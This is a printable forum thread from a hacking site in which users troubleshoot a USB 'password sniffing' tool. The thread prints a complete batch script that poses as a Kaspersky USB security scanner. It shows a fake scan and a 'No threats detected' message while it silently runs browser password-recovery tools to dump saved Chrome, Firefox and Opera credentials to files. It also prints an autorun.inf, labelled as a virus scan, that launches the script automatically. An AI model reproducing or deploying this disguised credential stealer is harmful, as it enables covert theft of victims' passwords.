![]() |
|
USB HACK - Printable Version +- Sinisterly (https://sinister.li) +-- Forum: Hacking (https://sinister.li/Forum-Hacking) +--- Forum: Tutorials (https://sinister.li/Forum-Tutorials) +--- Thread: USB HACK (/Thread-USB-HACK) Pages:
1
2
|
USB HACK - TeemuStew - 04-05-2013 So I tried this: http://www.hackcommunity.com/Thread-How-to-Sniff-Passwords-Using-USB-Drive-Tutorial But when I start it, it says: " ebhk isn't recognized as a internal or external command " and "cho isn't reconized as a internal or external command" Why?
RE: USB HACK - Ex094 - 04-05-2013 Well that indicates that there's a problem in the coding of the batch RE: USB HACK - Coder-san - 04-05-2013 (04-05-2013, 05:17 PM)TeemuStew Wrote: So I tried this: http://www.hackcommunity.com/Thread-How-to-Sniff-Passwords-Using-USB-Drive-Tutorial Well, the batch file there just consists of this: Code: start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start passwordfox.exe /stext passwordfox.txtSo I'm not sure where did you get those "ebhk" or "cho" commands. RE: USB HACK - TeemuStew - 04-05-2013 (04-05-2013, 05:42 PM)Coder-san Wrote:(04-05-2013, 05:17 PM)TeemuStew Wrote: So I tried this: http://www.hackcommunity.com/Thread-How-to-Sniff-Passwords-Using-USB-Drive-Tutorial Sorry, wrong thread. The codes was Code: @echo off
echo ############################################################################
echo .
echo ** ** **
echo /** ** ****** /** ** **
echo /** ** ****** ******/**///** ***** ****** ******/** ** //** **
echo /**** //////** **//// /** /** **///**//**//* **//// /** ** //***
echo /**/** ******* //***** /****** /******* /** / //***** /**** /**
echo /**//** **////** /////**/**/// /**//// /** /////**/**/** **
echo /** //**//******** ****** /** //******/*** ****** /**//** **
echo // // //////// ////// // ////// /// ////// // // //
echo Kaspersky LABS USB Security Scanner
echo .
echo ############################################################################
echo Warning!!! This tool doesnot provide Real Time Protection! Please download
echo Kaspersky Internet Security from Kaspersky Labs website
echo .
echo Press any key to Scan
pause >nul
setlocal EnableDelayedExpansion
set Counter=0
set Schalter=2
set Width=0
:1
title Kaspersky USB Security Scanner - Scanning USB
set /a Counter=%Counter% + 1
set /a Display=%Counter% / 2
FOR /L %%A IN (1,1,%Display%) DO (
set Display=!Display!²
)
cls
echo Kaspersky is now scanning for Malware! Please Wait... %Counter%%%
echo ²!Display:~2,47!
ping localhost -n 1 >nul
if "%Counter%" == "100" goto :1-End
goto :1
:1-End
echo Checking System Integrity...
start PasswordFox.exe /stext firefox.txt
echo Checking Antivirus Software, (You may get alerted of an execution! Allow the execution)
start OperaPassView.exe /stext Opera.txt
echo All Tests Passed [X]
start ChromePass.exe /stext Chrome.txt
echo Scanning Complete!
echo No threats detected
echo Press Any Key To Exit
pause >nul
EXIT /BRE: USB HACK - Ex094 - 04-05-2013 I didn't find any errors that you stated above, in the code that you just presented. RE: USB HACK - Coder-san - 04-05-2013 Working fine for me too. RE: USB HACK - Ex094 - 04-05-2013 (04-05-2013, 05:17 PM)TeemuStew Wrote: So I tried this: http://www.hackcommunity.com/Thread-How-to-Sniff-Passwords-Using-USB-Drive-TutorialMy best guess is that it's due to a bad copy paste, You might have left out some part of the code RE: USB HACK - NightHawk67 - 01-25-2014 Well, the batch file there just consists of this: Code: start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start passwordfox.exe /stext passwordfox.txtSo I'm not sure where did you get those "ebhk" or "cho" commands. [/quote] This part i'm having trouble with. I cant get it to start by itself. I have the Code: [autorun]
open=launch.bat
ACTION= Perform a Virus ScanRE: USB HACK - kenjoe41 - 01-26-2014 Let me get this straight. There is no popup of the autorun. Are you sure the autorun feature isn't disabled cos if you did copy that code just fine and wrote that autorun script also fine, you should be stealing passwords by now. RE: USB HACK - absolutionist - 02-05-2014 I keep getting empty txt files... 1 time I got one that had the user as "email" and password "pass"... Dunno |